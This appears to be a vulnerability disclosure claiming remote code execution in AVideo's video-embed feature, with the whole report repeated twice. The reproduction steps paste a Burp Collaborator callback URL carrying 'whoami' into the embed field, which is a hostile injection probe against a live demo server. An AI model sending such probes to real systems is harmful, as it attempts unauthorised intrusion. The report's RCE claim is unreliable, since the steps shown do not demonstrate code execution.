Description:
I found a very critical vulnerability on your open source program called RCE (Remote Code Execution) where an attacker can arbitrary execute code in the server
Impact:
An attacker could execute remote codes on your system
Step to Reproduce:
https://demo.avideo.com/mvideos
Click "Embed a video link"
Get your Burp Suite Collaborator link
Example:
o4ta880iz4vap09kaqw400po8fe52u.oastify.com
http://o4ta880iz4vap09kaqw400po8fe52u.oastify.com?whoami
whoami
then click Save
Video POC: https://youtu.be/aN8JZVc5zFM
Description:
I found a very critical vulnerability on your open source program called RCE (Remote Code Execution) where an attacker can arbitrary execute code in the server
Impact:
An attacker could execute remote codes on your system
Step to Reproduce:
https://demo.avideo.com/mvideos
Click "Embed a video link"
Get your Burp Suite Collaborator link
Example:
o4ta880iz4vap09kaqw400po8fe52u.oastify.com
http://o4ta880iz4vap09kaqw400po8fe52u.oastify.com?
whoamithen click Save
Video POC: https://youtu.be/aN8JZVc5zFM
Credits